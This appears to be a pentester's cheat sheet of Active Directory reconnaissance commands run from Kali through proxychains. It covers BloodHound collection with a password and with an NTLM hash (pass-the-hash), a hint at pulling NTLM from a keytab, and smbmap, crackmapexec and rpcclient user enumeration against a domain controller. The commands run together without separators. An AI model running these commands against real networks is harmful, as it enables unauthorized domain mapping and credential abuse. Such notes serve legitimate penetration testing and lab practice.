Domain Recon - Kali
proxychains bloodhound-python -c ALL -u kevin -p 'Passw0rd' -d red.com -dc dc.red.com -ns 10.9.20.10 --dns-tcpproxychains bloodhound-python3 -c ALL -u '[email protected]' --hashes 00000000000000000000000000000000:d66f37fd3d677522959e5b4aeecafb78 -d COMPLYEDGE.COM -ns 172.16.76.168 --dns-tcp (Extract NTLM from /etc/krb5cc.keytab)smbmap -H 10.9.20.10 -u kevin -p Passw0rdcrackmapexec winrm 10.9.20.10 -u kevin -p 'Password'crackmapexec smb 10.9.20.10proxychains rpcclient -U red.com/kevin.gustavo%Passw0rd 10.9.20.10
enumdomusers
queryuser 0x3601proxychains python3 GetADUsers.py -all -k -no-pass -dc-ip 10.9.20.10 red.com/AdministratorLast updated